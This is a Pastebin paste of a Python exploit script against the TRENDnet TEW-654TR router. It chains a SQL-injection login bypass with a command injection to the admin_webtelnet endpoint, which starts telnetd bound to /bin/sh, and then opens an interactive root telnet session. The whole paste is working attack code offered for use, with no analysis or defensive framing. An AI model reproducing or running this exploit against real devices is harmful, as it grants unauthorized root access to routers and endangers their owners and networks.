Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # Pop a root shell on the TEW-654TR via SQL injection & command injection.
- # Currently only works from the LAN side.
- import re
- import httplib
- import urllib
- import socket
- import os
- class Logging:
- WARN=0
- INFO=1
- DEBUG=2
- prefixes=[]
- prefixes.append(" [!] ")
- prefixes.append(" [+] ")
- prefixes.append(" [@] ")
- @classmethod
- def log_msg(klass,msg,level=INFO):
- pref=Logging.prefixes[level]
- print pref+msg
- def test_telnet():
- s=socket.socket()
- try:
- s.connect(("192.168.10.1",23))
- except Exception as e:
- return False
- return True
- def check_authentication(data):
- fail_re=re.compile('.*<redirect_page>back</redirect_page>.*')
- success_re=re.compile('.*<redirect_page>default</redirect_page>')
- success=None
- for line in data.splitlines():
- if fail_re.match(line):
- success=False
- Logging.log_msg(line,Logging.DEBUG)
- break
- elif success_re.match(line):
- success=True
- #Logging.log_msg(line,Logging.DEBUG)
- break
- return success
- SQL_INJECTION="a';select 1;--"
- TELNET_INJECTION="/usr/sbin/telnetd -l /bin/sh"
- username=SQL_INJECTION
- password=""
- #use an array of tuples rather than a dict to guarantee parameter order
- params="request=login"
- params+="&user_name="+username
- params+="&user_pwd"+urllib.quote(password)
- headers= {"Host":"192.168.10.1",
- "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:8.0.1) Gecko/20100101 Firefox/8.0.1",
- "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
- "Accept-Language":"en-us,en;q=0.5",
- "Content-Type":"application/x-www-form-urlencoded",
- "Referer":"http://192.168.10.1/login.htm"}
- Logging.log_msg("Attempting to authenticate using SQL injection.")
- #Logging.log_msg("SQL injection string set to: "+SQL_INJECTION)
- Logging.log_msg("Sending POST.")
- conn=httplib.HTTPConnection("192.168.10.1")
- conn.request("POST","/my_cgi.cgi?0.5219313003118983",params,headers)
- response=conn.getresponse()
- data=response.read()
- Logging.log_msg("Got response: %s %s"%(str(response.status),response.reason))
- conn.close()
- success=check_authentication(data)
- if True==success:
- Logging.log_msg("Authentication successful.")
- elif False==success:
- Logging.log_msg("Authentication failed. Exiting.",Logging.WARN)
- exit(1)
- else:
- Logging.log_msg("Unrecognized result.",Logging.WARN)
- exit(1)
- Logging.log_msg("Attempting to start telnetd via command injection.")
- params="request=admin_webtelnet"
- params+="&cmd="+urllib.quote(TELNET_INJECTION)
- conn=httplib.HTTPConnection("192.168.10.1")
- headers["Referer"]="http://192.168.10.1/st_device.htm"
- conn.request("POST","/my_cgi.cgi?0.19909728029442098",params,headers)
- response=conn.getresponse()
- Logging.log_msg("Got response: %s %s"%(str(response.status),response.reason))
- data=response.read()
- conn.close()
- if test_telnet():
- Logging.log_msg("Telnet started.")
- else:
- Logging.log_msg("Telnet not started successfully.",Logging.WARN)
- exit(1)
- Logging.log_msg("Starting interactive telnet session.")
- os.system("telnet 192.168.10.1")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement